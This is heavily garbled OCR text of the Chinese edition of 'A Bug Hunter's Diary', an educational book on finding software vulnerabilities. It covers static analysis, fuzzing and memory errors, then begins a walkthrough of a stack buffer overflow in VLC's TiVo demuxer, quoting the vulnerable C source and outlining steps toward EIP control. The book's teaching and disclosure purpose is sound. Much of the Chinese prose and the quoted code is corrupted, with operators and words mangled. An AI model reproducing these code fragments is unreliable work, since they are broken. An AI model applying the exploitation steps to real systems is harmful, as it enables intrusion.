


no starch 


m 1 
as X. press 
fL 
"e Ta 
> P «i = " 
r JP C 
"-— p “tas 
« um 
- - 
" è - 0 
et = | pe” 
n QM. 
4 " $ 
b ars » 


7 


LA Guided Tour ONE the Wilds of Software Security 


X 


ZEN DOES 
YF POSTS & TELECOM PRESS 





AULA! Bug Hunter’ s Diary aie. 








图 书 在 版 编目 CC I PO 数据 


$e Aid / (ER) WA (Klein, T.) 3% ; 张 伸 译 . 
一 北京 : 人 民 邮 电 出 版 社 ，2012.8 
(图 灵 程 序 设计 从 书 ) 
书 名 原文 : A Bug Hunter’ s Diary:A Guided Tour 
Through the Wilds of Software Security 
ISBN 978-7-115-29044-1 


I. Of II. Orde Qu IL OPERA 
IV. @TP309 


中 国 版 本 图 书 饰 CIP 数 据 核 子 (2012) 2817340277 


内 容 提 要 
本 书 从 实践 角度 介绍 安全 漏洞 ， 挡 述 了 作者 在 过 去 儿 年 里 怎样 发 现 漏 将 、 上 怎样 利用 汤 洞 
来 攻击 以 及 开发 商 如 何 修 复 ， 守 在 为 开发 人 员 提 醒 ， 为 漏 润 研究 领域 的 工作 人 员 提 供 工 作 
思路 。 
本 书 适 合 所 有 程序 员 以 及 安全 领域 相关 工作 人 员 。 
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= 者 F 


2011 年 12 月 发 生 的 一 系列 网 站 账号 密码 泄漏 事件 ,使 得 网 络 安全 再 一 次 成 了 
IT 疼 里 峰 外 的 热门 话题 ， 电 向 的 攻 动 发 展 也 把 安全 问题 甩 到 我 们 面前 。 

在 一 些 程序 员 社 区 里 ， 大 家 局 愤 声 讨 那 些 账 号 密码 泄漏 的 网 站 。 作 为 IT A, 
声讨 之 后 我 们 更 应 该 回头 看 看 目 己 写 的 代码 ， 反 思 目 己 在 编写 安全 代码 方面 的 
表现 。 

BEXAR, FZ AS. RITA. AREER Ali. AAA 
悉 、 不 注意 的 编 公 是 存在 隐患 、 很 容易 被 利用 攻击 的 。 

这 是 一 本 讲述 安全 漏洞 的 书 。 作 者 用 实际 的 例子 讲解 他 是 怎样 发 现 这 些 漏 洞 、 
怎样 利用 漏洞 来 攻击 ， 以 及 开发 商 是 怎样 修复 这 些 漏洞 的 。 

作者 的 知识 面 广 且 次 。 这 些 看 上 去 很 艰 座 的 安全 漏洞 话题 ， 作 者 用 日 记 的 方 
式 刀 九 道 来 ， 条 理 清楚 ， 化 繁 为 人 镜 ， 癌 读者 展示 了 本 不 该 阴 生 的 世界 。 
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欢迎 阅读 《 捉 虫 日 记 》。 这 本 书 描述 了 过 去 几 年 里 我 发 现 的 七 个 有 趣 、 真 实 
的 软件 安全 漏洞 的 过 程 。 每 草 侧 重 于 一 个 bug。 我 将 解释 是 怎么 找 出 这 个 bug 的 ， 
利用 它 的 此 又 ， 以 及 开发 者 最 终 怎样 给 它 打 补丁 。 





内 容 简 介 


本 书 主要 是 从 实践 的 角度 问 你 展示 捉 虫 的 世界 。 读 过 本 书后 ， 你 将 会 对 捉 虫 
人 用 以 发 现 安全 漏洞 的 方法 、 如 何 用 “概念 验证 ”代码 (proof-of-concept code ) 
测试 漏洞 ， 以 及 如 何 癌 开发 者 报告 漏洞 有 更 好 的 理解 。 

另外 ， 本 书 还 介绍 了 这 七 个 bug 背后 的 故事 。 这 些 故 事 很 有 价值 。 




















目标 读者 


本 书 的 日 标 读 者 是 安全 人 研究 人 员 、 安 全 顾问 、C/C++ 程 序 员 、 入 侵 测 试 员 
( penetration tester ) ， 以 及 任何 想 投 号 到 捉 虫 这 个 令 人 激动 的 世界 中 的 人 。 为 更 好 
地 理解 书 中 内 容 ， 你 应 该 扎实 擎 握 C 语 言 ， 并且 对 x86 汇编 很 就 悉 。 

如 朵 你 是 着 洞 研 究 领 域 的 新 人 ， 本 书 能 带 你 了 解 捉 虫 、 源 洞 利 用 以 及 报告 软 
件 漏 洞 的 方方面面 。 如 有 打 你 是 经 验 丰富 的 捉 虫 老手 ， 针 对 你 已 玖 悉 的 各 种 挑战 ， 
本 书 可 以 提供 新 的 视角 ， 而 且 会 时 不 时 让 你 会 心 一 笑 。 


























免责 声明 


本 书 的 目标 是 教授 读者 如 何 识 别 、 抵 御 以 及 绥 解 软件 的 安全 漏洞 。 理 解 用 以 
寻找 并 利用 少 润 的 技术 对 于 彻 撒 营 握 睛 层 问题 以 及 适当 的 缓解 技术 是 必要 的 。 
2007 年 以 来 ， 制 作 或 传播 “墨客 工具 ”在 我 的 祖国 德国 已 是 违法 的 。 这 些 工具 包 
括 简 单 的 端口 扫描 程序 和 有 效 的 漏洞 利用 程序 。 因 此 ， 为 休 守 法 律 ， 本 书 中 不 会 
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提供 完整 的 漏洞 利用 程序 代码 。 所 有 的 示例 仅仅 显示 控制 漏洞 程序 执行 流 ( 指令 
指针 或 者 程序 计数 器 控制 ) 的 步 又 。 


相 天 资源 


本 书 提 到 的 所 有 URL 链接 、 样 例 代码 、 勘 误 、 更 新 内 容 以 及 其 他 信息 都 可 在 
以 下 网 址 找到 : http://wwwi.trapkit.de/books/bhd/。 
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PE k X MU EYE PR bug 的 过 程 ， 然 而 在 本 书 中 我 们 用 这 个 术语 特 指 
发 现 安 全 依 关 的 软件 bug 的 过 程 。 安 全 依 关 的 bug， 也 被 称 作 软件 的 安全 漏洞 
( security vulnerability )， 攻击 者 可 利用 它 远 程 攻 击 系 统 、 提 升 本 地 权限 、 跨 越权 限 
边界 ， 或 者 严重 破坏 系统 。 

KA 10 年 前 ， 搜 寻 软 件 安 全 漏洞 大 多 还 只 是 一 种 业余 爱好 或 引起 媒体 注意 
的 方法 。 等 到 人 们 意识 到 这 里 存在 大 量 的 利益 时 ， 捉 虫 才 开始 慢 慢 成 为 一 种 正式 
职业 。 H 

媒体 大 量 报道 软件 的 安全 漏洞 和 利用 这 些 漏洞 的 程序 (也 称 作 利用 程序 ) 此 
外 , 有 许多 书籍 和 网 络 资源 介绍 如 何 利用 安全 漏洞 , 还 有 关于 如 何 拔 露 已 发 现 bug 
的 无 休止 的 和 争论。 尽管 如 此 ， 涉 及 捉 虫 过 程 本 身 的 出 版 物 却 少 得 可 怜 。 虽 然 软 件 
漏洞 和 破解 这 样 的 术语 已 被 广泛 使 用 ， 很 多 人 ， 包 括 很 多 信息 安全 专业 人 士 ， 并 
ANB AE d m A Xe ERE ACUTE e i Hz 

Jh] 10 个 换 虫 人 他 们 怎样 在 软件 里 寻找 安全 相关 的 bug, 可 能 会 得 到 10 PATA 
的 答案 ， 这 就 是 至 今 仍 没有 “ 换 虫 秘籍 ”之 类 的 书 的 原因 ， 并 且 将 来 可 能 也 不 会 
有 。 我 的 目的 不 是 写 一 本 一 般 的 操作 指南 ， 而 是 要 描述 目 己 在 真实 软件 中 找到 这 
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类 bug 的 方法 和 技巧 。 愿 这 本 书 能 帮助 你 形成 日 己 的 风格 ， 从 而 让 你 也 可 以 找到 
一 些 有 趣 的 软件 安全 bug。 


1.1 RF 


人 们 搜寻 软件 bug 的 目的 和 动机 各 式 各 样 。 一 些 独 立 的 捉 忠 人 希望 能 改善 软 
件 的 安全 性 ， 而 男 一 些 人 妃 逐 名 利 、 媒 体 关 注 、 报 酬 以 及 工作 机 会 等 个 人 利益 。 
公司 可 能 需要 找 出 这 样 的 bug， 从 而 在 市 场 彰 销 中 大 肆 宣 扬 。 当 然 ， 也 总 是 有 心 
怀 不 轨 的 家 伙 在 寻找 新 方法 侵入 你 的 系统 或 网 络 。 万 一 方面 ， 也 有 人 这 样 做 仅仅 
因为 觉得 有 趣 ， WEIL IRB © 








1.2 通用 技巧 


虽然 没有 正式 文档 描述 标准 的 捉 虫 过 程 ， 但 通用 技巧 还 是 存在 的 。 这 些 技巧 
可 以 分 成 两 类 : 静态 的 和 动态 的 。 在 议 人 态 分 析 中 (通常 也 称 作 静 态 代 码 分 析 )， 我 
们 会 检查 软件 的 源 代 码 或 者 二 进 制 文件 的 反 汇编 码 ， 但 不 会 执行 软件 。 而 动态 分 
析 是 在 执行 软件 时 对 它 进 行 调试 或 模糊 测试 。 两 种 技巧 各 有 利弊 ， 大 部 分 捉 虫 人 
会 将 两 者 结合 起 来 用 。 








1.2.1 个 人 技术 仿 好 


多 数 时 候 , 我 推 存 议 态 分 析 方 法 。 我 经 常 逐 行 阅读 源 代码 或 软件 的 反 汇 编码 ， 
去 理解 它 。 当 然 ， 从 头 到 尾 阅 读 源 代码 往往 不 大 现实 ， 碍 找 bug 时 ， 我 通常 首先 
答 试 找 出 哪里 是 受用 户 影 响 的 输入 数据 得 以 进入 软件 的 对 外 接口 。 这 些 数据 可 能 
来 日 网 络 、 文 件 或 者 执行 环境 等 。 

接 下 来 ， 我 会 研究 输入 数据 在 软件 中 “ 族 走 ”的 不 同 路 径 ， 留 意 任 何 潜 在 的 
可 被 利用 来 破坏 数据 的 代码 。 有 时候 我 会 在 读 源 代码 CULE 2) 或 者 反 汇 编码 
CULE 6 et ) 时 标记 这 些 不 同 路 径 的 入 口 。 有 时 候 我 会 结合 静 仿 代码 分 析 和 调试 结 
A CIUS 538), 定位 处 理 输入 数据 的 代码 。 开 发 漏洞 利用 程序 时 我 也 倾 品 于 结合 
前 仿 分 析 和 动态 分 析 两 种 方法 。 

发 现 一 个 bug 之 后 ， 我 会 去 证 明 它 确实 是 可 利用 的 。 因 此 我 会 答 试 为 它 构 
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建 一 个 漏洞 利用 程序 ， 这 样 一 个 程序 做 好 之 后 ， 就 可 以 投入 大 把 的 时 间 到 调试 
a 


1.2.29 ”代码 中 潜在 的 漏洞 


静态 分 析 只 是 捉 果 的 一 种 方法 ,发 现代 码 中 淤 在 漏洞 的 万 一 种 方法 是 留心 观 
察 靠 近 “ 不 安全 ”C/C++ 库 因数 的 代码 ， 臂 如 strcpy() 和 strcat()， 寻 找 可 能 
的 缓冲 区 溢出 。 或 者 ,可 以 在 反 汇 编 后 搜索 movsx 汇编 指令 ,寻找 和 从 号 扩展 ( sign- 
extension ) 漏洞 。 如 采 找 到 了 一 处 漏洞 ， 可 以 回 前 追查 这 段 代 码 ， 确 定 它 是 否 
骏 露 了 可 通过 应 用 入 口 来 访问 的 漏洞 。 我 很 少 用 这 种 方法 ， 但 许多 捉 虫 人 很 信 
TL E o 














1.2.8 ”模糊 测试 


模糊 测试 是 一 种 完全 不 同 的 捉 虫 方法 ， 它 是 一 种 动态 分 析 技 术 ， 由 一 组 提供 
韭 正常 输入 的 测试 组 成 。 我 不 是 模糊 测试 或 模糊 测试 框 染 的 专家 ,但 我 知道 有 的 
捉 虫 人 日 行 开 发 模糊 测试 框 上 识 ， 用 他 们 的 工具 能 发 现 大 部 分 的 bug, RACHA 
用 这 种 方法 来 确定 用 户 在 哪里 输入 ， 有 时 也 用 来 查找 bug (ULE 8 9$ )。 

你 可 能 想 知 道 株 糊 测 试 是 如 何 确定 用 户 输入 从 哪里 进入 软件 的 。 想 象 一 下 你 
需要 检查 一 个 复杂 应 用 的 二 进 制程 序 的 bug， 找 出 它 的 各 个 入 口 点 并 不 容易 ， 但 
是 复杂 应 用 程序 经 常 因 错 误 的 输入 数据 而 骨 尝 ， 这 在 需要 分 析 处 理 数 据 文件 的 应 
FACES Ay erie, PUNE Sa. DS. Re BOSE AY A 
与 安全 性 无 关 (〈 璧 如 浏览 大 中 发 生 除 零 错误 ), 但 是 它们 通常 会 提供 一 个 人口 ,于 
是 我 就 可 以 开始 寻找 受用 户 影 响 的 输入 数据 。 


























1.2.4 延伸 阅读 


现 有 发 现 bug 的 方法 和 技巧 是 有 限 的 , 关于 寻找 软件 中 安全 漏洞 的 更 多 信息 ， 
我 推荐 Mark Dowd John McDonald 和 Justin Schuh 4344) The Art of Software Security 
Assessment: Identifying and Preventing Software Vulnerabilities ( Addison-Wesley, 2007 ) 
一 书 ,如果 想 了 解 更 多 关于 模糊 测试 的 信息 ,可 以 参考 Michael Sutton, Adam Greene 
和 Pedram Amini 合 车 的 《模糊 测试 强制 性 安全 漏洞 发 据 》( Fuzzing: Brute Force 
Vulnerability Discovery ). 











4|812 E dm 


1.3 内存 错误 


本 书 提 到 的 漏洞 有 一 个 共同 点 ， 它 们 都 会 导致 可 利用 的 内 存 错误 。 这 样 的 内 
存 错 误会 发 生 在 进程 、 线 程 或 内 核 出 现 以 下 情况 时 : 

a 使 用 了 不 属于 它 的 内 存 〈 例 如 空 指 针 解 引用 ，A.2 PANA ) 

a 使 用 了 分 配 之 外 的 内 存 ( 例如 缓冲 区 溢出 ，A.1 市 详细 介绍 ) 

a 使 用 了 未 初始 化 的 内 存 ( 例如 未 初始 化 的 变量 ) 中 

a 使 用 了 错误 的 堆 内 存 管理 (例如 二 次 释放 ) 中 

内 存 错误 通常 发 生 在 错误 地 使 用 了 C/C++ 的 某 些 强 大 特性 时 ， 比 如 使 用 显 式 
内 存 管理 或 指针 算术 。 

有 一 类 内 存 错误 叫做 内 存 数 据 损 坏 (memory corruption )。 这 种 情况 往往 发 生 
在 一 个 进程 、 线 程 或 内 核 修 改 不 属于 自己 的 内 存 位 置 ， 或 者 对 内 存 内 容 的 修改 破 
坏 了 其 状态 时 。 

如 有 果 不 加 悉 这 些 内 存 错误 ,建议 你 看 一 看 A.1 方 、A.2 市 和 A.3 市 , 这 几 市 介 
绍 了 编程 错误 的 基本 概念 以 及 本 书 讨 论 的 源 洞 。 

除了 可 利用 的 内 存 错 误 , 还 存在 几 十 种 其 他 类 型 的 漏洞 ,包括 人 逻辑 错误 和 Web 
特有 的 漏洞 , 壁 如 跨 站 点 脚本 攻击 ( cross-site scripting )、 跨 站 点 请 求 伪造 ( cross-site 
request forgery )、SQL 注入 等 。 这 里 只 列 出 一 小 部 分 ， 其 他 类 型 的 漏洞 不 属于 本 
书 讨论 的 范围 ， 本 书 中 我 们 主要 讨论 可 利用 的 内 存 错 误 。 























1.4 专用 工具 


寻找 软件 bug 或 者 构造 漏洞 利用 程序 来 测试 这 些 bug 时 ， 我 需要 借助 工具 来 
看 清 应 用 程序 的 内 部 机 制 ， 通 并 我 使 用 调试 融和 反 汇 编 工 具 。 











1.4.1 调试 器 





调试 硕 通 稼 提供 附加 到 用 户 空 间 进 程 或 者 内 核 、 读 写 寄 存 希 和 内 存 、 用 上 断 点 
和 单 步 控制 程序 执行 流 等 功能 。 每 个 操作 系统 通 第 都 有 目 市 的 调试 钥 ， 忆 外 还 有 
一 些 第 三 方 调 试 体 。 表 1-1 列 出 了 本 书 涉及 的 几 种 操作 系统 平台 和 调试 带 。 








操作 系统 
Microsoft 
Windows 
Linux 
Solaris 
Mac OS X 
Apple 10S 


41-1 本 书 中 用 到 的 调试 器 

yj uw 器 
WinDbg (微软 官方 提供 的 调试 器 ) 
OllyDbg 及 其 变 体 Immunity Debugger 
The GNU Debugger (gdb) 
The Modular Debugger (mdb) 
The GNU Debugger (gdb) 
The GNU Debugger (gdb) 
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内 核 调试 


pm gm gm gem IN eu 


eA F EM, ZT AIO RAT AE al, B.1 节 、B.2 WA B4 
节 介 绍 了 一 些 调 试 器 常用 的 命令 清单 。 


1.4.2” 反 汇编 工具 


要 检查 一 个 没有 源 代 码 的 程序 ， 可 以 通过 旋 汇 编 代 码 来 分 析 。 调 试 硕 都 有 反 
汇编 进程 或 内 核 代码 的 功能 ， 但 往往 不 是 很 直观 ,不 那么 好 用 。Interactive 
Disassembler Professional (IDA Pro ) 外 填补 了 这 一 空白 ， 它 支持 50 多 种 处 理 器 系 
列 ， 提 供 了 良好 的 交互 性 、 可 扩展 性 ， 还 有 代码 图 解 表 示 功 能 (code graphing )。 
要 分 析 程 序 的 二 进 制 码 , IDA Pro 是 必 备 工具 , 详细 的 使 用 介绍 可 参考 Chris Eagle 
HY (IDA Pro 权威 指南 (第 2 版 )》 





1.5 EIP = 41414141 


为 了 演示 这 些 bug 所 暗含 的 安全 问题 , 我 


将 介绍 如 何 通 过 控制 CPU 的 指令 指针 CIP) 
来 取得 对 漏洞 程序 执行 流 的 控制 。 指令 指针 寄 











存 器 或 者 程序 计数 (PC ) 寄存 器 里 存放 的 是 当 
前 代码 段 中 下 一 条 将 要 执行 指令 的 偏 移 量 。 中 
控制 了 这 个 寄存 器 , 就 完全 控制 了 这 个 漏洞 进 
程 的 执行 流 。 我 将 把 这 个 寄存 器 的 值 修改 成 
0x41414141 ( ASCI 字符 串 AAAA 的 十 六 进 制 表示 )、0x41424344 ( ASCII 字符 串 
ABCD 的 十 六 进 制 表示 ) 或 者 其 他 类 似 的 值 ， 来 演示 对 指令 指针 的 控制 。 所 以 在 
后 面 的 章节 中 ， 如 果 你 看 到 EIP = 41414141， 就 意味 着 我 已 经 取得 对 漏洞 进程 的 





控制 权 。 


指令 


StE/ Gm: 

O EIP——32 位 指令 指针 
C [A-32) 

O RIP 一 一 64 位 指令 指针 
C Intel 64) 








口 Ris (Bp PC >——Apple iPhone 
使 用 曲 ARM (ds G 42 ty 
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一 旦 控制 了 指令 指针 ， 就 有 很 多 方法 可 以 把 它 变 成 一 个 完全 可 行 、 可 用 作 武 
融 的 漏洞 利用 程序 。 关 于 漏洞 利用 程序 开发 的 更 多 信息 ， 可 以 参考 Jon Erickson 
的 《黑客 之 道 : 漏洞 发 掘 的 艺术 》( Hacking: The Art of Exploitation, 2" edition ), 
或 者 可 以 输入 exploit writing， 在 Google 的 海量 在 线 信息 中 搜索 。 




















1.6 RE 

这 一 半 提 及 了 大 量 背 景 知 识 ， 你 可 能 会 有 很 多 问题 。 别 担心 ， 有 问题 是 好 事 
儿 ， 随 后 的 七 篇 日 记 会 深入 人 研究 这 里 提 到 的 内 容 ， 而 且 可 以 解答 你 的 许多 疑问 。 
你 也 可 以 通读 附录 来 了 解 整 本 书 所 讨论 主题 的 背景 知识 。 

















注意 ”这些 日 记 并 不 是 按时 间 顺 序 排列 的 , 而 是 按照 主题 来 排列 的 ， 从 而 层 层 建 
立 起 各 种 概念 。 


附注 

[1] 参考 Pedram Amini 的 “Mostrame la guita! Adventures in Buying Vulnerabilities" , 2009, 
http://docs.google.com/present/view?id=dcc6wpsd_20ghbpjxcr ( % hk http://bit.ly/xvDwAI ); 
Charlie Miller 的 “The Legitimate Vulnerability Market: Inside the Secretive World of 0-day 
Exploit Sales", 2007 , http://weis2007.econinfosec.org/papers/29.pdf( 短 址 http://bit.ly/ytK qpd ); 
iDefense Labs Vulnerability Contribution Program 的 http://labs.idefense.com/vcpportal/login.html 
( &&fiE http://bit.ly/xd4Vdj ); TippingPoint's Zero Day Initiative 的 http://www.zerodayinitiative.com/ 
( HE http://bit.ly/ZLbzEI )。 

[2] 参考 Daniel Hodson 的 “Uninitialized Variables: Finding, Exploiting, Automating" (presentation, 
Ruxcon, 2008), http://felinemenace.org/~mercy/slides/RUXCON2008-Uninitialized Variables. pdf 
( 短 址 http://bit.ly/zZjJnx ). 

[3] 参考 Common Weakness Enumeration, CWE List, CWE — Individual Dictionary Definition(2.0), 
CWE-415: Double Free at http://cwe.mitre.org/data/definitions/415.html ( 短 址 http://bit.ly/zThqAw )。 

[4] 2 -¥http://www.hex-rays.com/idapro/ ( &iJiEhttp://bit.ly/y3V]qt ). 

[5] 参考 Intel® 64 and IA-32 Architectures Software Developer s Manual, Volume 1: Basic Architecture, 
http://www.intel.com/products/processor/manuals/ ( 短 址 http://intel.]y/wBUO0aN )。 





回 到 90 年 代 


2008 年 /0 月 /2 日 ， 星 期 日 


今天 我 看 了 一 下 VideoLAN 广 受 欢迎 的 VLC 媒体 播放 需 的 源 代 码 。 我 喜欢 
VLC， 它 可 以 运行 在 所 有 我 喜欢 的 操作 系统 平台 上 ， 文 持 多 种 媒体 文件 格式 。 但 
是 支持 所 有 这 些 不 同 格式 的 媒体 文件 也 有 副作用 ，VLC 做 了 大 量 的 文件 解析 工 
作 ， 而 这 往往 意味 着 有 很 多 尚未 发 现 的 bug。 











注意 Dick Grune 和 Ceriel J.H. Jacobs! | 在 Parsing Techniques: A Practical Guide 
一 书 中 写 道 :“ 解 析 是 按照 给 定 的 语法 结构 化 一 个 线性 表示 的 过 程 。 解析 
器 是 一 个 把 字 节 组 成 的 原始 字符 串 分 解 成 一 个 个 单独 词 、 句 的 软件 。 解析 
难度 取决 于 数据 的 格式 ， 可 能 非常 复杂 并 且 容 易 出 错 。 


PUES VLC 的 内 部 工作 机 制 之 后 ,我 只 用 半天 时 间 就 找到 了 第 一 个 漏洞 。 那 
是 一 个 经 典 的 栈 缓冲 区 溢出 ( 见 A.1 市 )。VLC 在 解析 一 种 名 为 TiVo 的 媒体 文件 
格式 (TiVo 数字 录制 设备 专用 的 文件 格式 ) 时 ,会 发 生 洪 出 。 找 出 这 个 bug 之 前 ， 
我 从 没 听 说 过 这 种 文件 格式 ,但 这 并 不 妨碍 我 利用 这 个 漏洞 。 
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2.4. A Es 





我 是 这 样 发 现 这 个 漏洞 的 。 kR & tet 32 位 
E 第 一 步 : 生成 VLC 中 解 复 用 需 的 清单 。 Windows Vista SPI z 和 运行 
口 第 二 步 : 识别 输入 数据 。 VLC 0.9.4 完成 曲 这 


口 第 三 步 : 跟踪 输入 数据 。 
下 面 各 节 将 详细 解释 这 个 过 程 。 
2.1.1 第 一 步 : 生成 VLC 中 人 解 复 用 器 的 清 


下 载 并 解压 缩 VLC 的 源 代码 之 后 站， 先生 成 一 个 VLC 媒体 播放 器 可 用 的 解 
复 用 名 清单 。 





注意 ”数字 视频 中 , 解 复 用 是 指 为 播放 媒体 文件 ,从 视频 码 流 或 容器 中 分 离 育 频 、 
视频 和 其 他 数据 的 过 程 。 解 复 用 器 是 从 码 流 或 容器 中 提取 这 些 组 
软件 。 








生成 解 复 用 器 的 清单 并 不 难 , 因为 VLC 已 经 把 大 部 分 解 复 用 器 分 成 不 同 的 C 
程序 文件 存放 在 目录 vlc-0.9.4modules\demuxA 下 了 ( JLAI 2-1 ), 


| € Tee 


SBHDNu lc—-8.9 .4^ modules demux >dir 
gh lume in drive C has no label 
Volume Serial Nunber is 84C6- 4231 


Directory of C:\BHDNulc—-8.9.4\modules\demnux 
EA 


asademux.h 
[auformat 1 
S.C 


rtp.h 
subtitle asa.c 
Ts RE 


Ast 
1 .266 .934 bytes 
3.187.572.736 bytes Free 


0.9.4*«modules'demux? 





K| 2-1 VLC 解 复 用 器 清单 


2.1.2 ”第 二 步 : 识别 输入 数据 
接 下 来 ， 我 尝试 标识 出 解 复 用 器 处 理 的 输入 数据 。 读 了 一 些 C 代 码 后 ， 我 偶 


RED BX stu, TEA EB EE Hist OS CE BJSE SC PERI 


2.1 发 现 漏洞 





源 代 码 文 件 ”vlc-0.9.4\include\vlc demux.h 


41 struct demux t 


42 ( 


VLC COMMON MEMBERS 


/* Module properties */ 
module t *p module; 


/* eg informative but needed (we can have access+demux) */ 


char *psz access; 
char *psz demux; 
char *psz path; 


/* input stream */ 
stream t "e /* NULL in case of a access+demux in one */ 
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"B $S4 行 声明 结构 体 成 员 s， 描 述 输入 码 流 (input stream )。 这 正 是 我 要 找 的 : 
解 复 用 带 所 处 理 的 输入 数据 的 引用 。 


2.1.3 ”第 三 步 : 跟踪 输入 数据 


找到 demux t 数据 结构 和 它 表 示 输 入 码 流 的 成 员 后 ， 我 在 所 有 解 复 用 器 文件 
中 搜索 它 的 引用 。 输 入 数据 一 般 通 过 p demux-»s 来 引用 ， 如 下 面 代码 中 第 1623 
行 和 1641 行 所 示 。 碍 找 编程 错误 时 , 每 发 现 一 处 这 样 的 引用 ,我 都 会 奶 踪 输入 数 
据 。 用 这 个 方法 ， 我 找到 了 下 面 这 个 漏洞 。 











源 代 码 文 件 ”vlc-0.9.4\modules\demux\Ty.c 


函数 


parse master() 


1623 static void parse master(demux t *p demux) 


1624 1 
1625 
1626 
1627 
1628 
1629 
1630 
1631 
1632 
1633 
1634 
1635 


demux sys t *p sys - p demux-»p sys; 

uint8 t mst buf[32]; 

int i, i map size; 

int64 t i save pos = stream Tell(p demux-»s); 
int64 t i pts secs; 


/* Note that the entries in the SEQ table in the stream may have 
different sizes depending on the bits per entry. We store them 
all in the same size structure, so we have to parse them out one 
by one. If we had a dynamic structure, we could simply read the 
entire table directly from the stream into memory in place. */ 
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1636 
1637 /* clear the SEO table */ 
1638 free(p sys-»seq table); 


1639 

1640 /* parse header info */ 

1641 stream Read(p demux-»s, mst buf, 32); 

1642 i map size = U32 AT(8&mst buf[20]); /* size of bitmask, in bytes */ 
1643 p sys-»i bits per seq entry - i map size * 8; 

1644 i = U32 AT(&mst buf[28]);  /* size of SEO table, in bytes */ 

1645 p sys-»i seq table size = i / (8 + i map size); 

1646 


1647 /* parse all the entries */ 

1648 p sys-»seq table = malloc(p sys-»i seq table size * sizeof(ty seq table t)); 
1649 for (i20; i«p sys-»i seq table size; i++) { 

1650 stream Read(p demux-»s, mst buf, 8 + i map size); 


[ 


第 1641 行 , PEZ, stream Read() 读 取 一 个 TiVo 媒体 文件 的 32B 用 户 控 制 数据 
(通过 p demux-»s 引用 ), 保存 到 栈 缓冲 区 mst_buf F, mst buf 在 第 1626 行 声明 。 
第 1642 fT, ZK U32 AT 从 mst buf 中 取出 用 户 控 制 值 ， 保 存 到 有 符号 整 型 变量 
i map size 中 。 第 1650747, Zt stream Read() 再 次 把 媒体 文件 中 的 用 户 控 制 数 
据 保 存 到 栈 绥 冲 区 mst_buf 中 。 但 是 这 一 次 ，stream Read() 使 用 用 户 控 制 值 
i map size 来 计算 复制 到 mst buf 中 数据 的 大 小 。 这 将 导致 一 个 容易 被 利用 的 典 
AU BE Be tH K Ha C 见 ALL e 

下 面 是 对 这 个 bug Help, AW 2-2 所 示 。 

















p_demux—>s are 


8) 3 ar] 





图 2-2 Bim PA A AE PERE p Ya Ej BRE V 


(1) TiVo 媒体 文件 的 32B FH P dC dd | SEXE PDC mst buf Fo 目标 缓冲 
区 的 大 小 是 32B。 
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(2) 从 绥 冲 区 中 取出 AB 的 用 户 控制 值 保存 到 imap_size 中 。 

(3) 再 次 复制 Ti Vo 媒体 文件 中 的 用 户 控制 数据 到 mst_buf 中 。 这 一 次 , 复制 的 
数据 大 小 由 变量 i map size 计算 得 出 。 如 果 i map size 的 值 超过 24B ， 就 会 发 生 
RRIP h (IL A. 175 )。 








2.2 imi FH 


为 利用 这 个 漏洞 ， 我 执行 了 下 面 的 步骤 。 

a 第 一 步 : 找 一 个 TiVo 格式 的 样 例 电影 文件 。 

O 第 二 步 : 找 一 条 代码 路 径 执行 到 漏洞 代码 。 

O 第 三 步 : 修改 这 个 Tivo 电影 文件 ， 使 VLC Bist; 

口 第 四 步 : 修改 这 个 TiVo 电影 文件 ， 控 制 EIP, 

要 利用 一 个 文件 格式 的 bug， 方 法 不 止 一 个 。 可 以 重新 做 一 个 格式 正确 的 文 
件 ， 也 可 以 修改 一 个 已 存在 的 正确 文件 。 这 个 例子 中 我 采用 后 一 种 方法 。 





t8 4L. > AT; > ` | 
| = 、 p x | TiVo 格 式 的 样 例 电 网 让 http://samples.mplay- 
影 文件 PH aiv 
erng. u/ 是 "^ Ta aD 355. M. 
首先 , 从 http:/samples.mplayerhq.hu/ 下 载 下 “这 里 可 以 找到 各 种 格式 的 多 
面 这 个 TiVo 样 例文 件 。 媒体 样 例 文件 . 


$ wget http://samples.mplayerhq.hu/TiVo/test-dtivo-junkskip.ty42b 

--2008-10-12 21:12:25-- http://samples.mplayerhq.hu/TiVo/test-dtivo-junkskip.ty42b 
Resolving samples.mplayerhq.hu... 213.144.138.186 

Connecting to samples.mplayerhq.hu|213.144.138.186|:80... connected. 

HTTP request sent, awaiting response... 200 OK 

Length: 5242880 (5.0M) [text/plain] 

Saving to: "test-dtivo- junkskip.ty4' 

100%[=========================>] 5,242,880 | 240K/s in 22s 


2008-10-12 21:12:48 (232 KB/s) - ~test-dtivo-junkskip.ty+° saved [5242880/5242880] 


2.2.2 第 二 步 : 找 一 条 代码 路 径 执行 到 漏洞 代码 

找 不 到 TiVo 文件 格式 的 规范 文档 ， 所 以 我 直接 读 源 代码 来 寻找 能 到 达 函 数 
parse_master() 中 漏洞 代码 的 执行 路 径 。 

VLC 加 载 TiVo 文件 时 ， 将 执行 以 下 流程 〈 引 用 的 所 有 源 代 码 都 来 自 VLC 的 
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vic-0.9.4\modules\demux\Ty.c )。 相 关上 晒 数 中 第 一 个 被 调用 的 是 Demux()。 


| 


386 static int Demux( demux t *p demux ) 


387 1 

388 demux sys t *p sys = p demux-»p sys; 

389 ty rec hdr t *p rec; 

390 block t *p block in - NULL; 

391 

392 /*msg Dbg(p demux, "ty demux processing" );*/ 
393 


394 /* did we hit EOF earlier? */ 
395 if( p sys-»eof ) 


396 return 0; 

397 

398 [* 

399 * what we do (1 record now.. maybe more later): 

400 * - use stream Read() to read the chunk header & record headers 
401 * - discard entire chunk if it is a PART header chunk 

402 * - parse all the headers into record header array 

403 * - keep a pointer of which record we're on 

404 * - use stream Block() to fetch each record 

405 * - parse out PTS from PES headers 

406 * - set PTS for data packets 

407 * - pass the data on to the proper codec via es out Send() 

408 

409 * if this is the first time or 

410 * if we're at the end of this chunk, start a new one 

411 n 

412 /* parse the next chunk's record headers */ 

413 if( p sys-»b first chunk || p sys-»i cur rec >= p sys-»i num recs ) 
414 

415 if( get chunk header(p demux) == 0 ) 


对 第 395 行 和 413 行 做 一 些 健 全 测试 ( sanity check) 之 后 ， 第 415 行 调用 了 
PRZX get chunk header(). 


=| 
112 #define TIVO PES FILEID ( Oxf5467abd ) 
[sa 


1839 static int get chunk header(demux t *p demux) 


1840 { 

1841 int i readSize, i num recs; 

1842 uint8 t *p hdr buf; 

1843 const uint8 t *p peek; 

1844 demux sys t *p sys - p demux-»p sys; 

1845 int i payload size; /* sum of all records' sizes */ 
1846 

1847 msg Dbg(p demux, "parsing ty chunk #%d", p sys-»i cur chunk ); 
1848 


1849 /* if we have left-over filler space from the last chunk, get that */ 
1850 if (p sys-»i stuff cnt > 0) { 
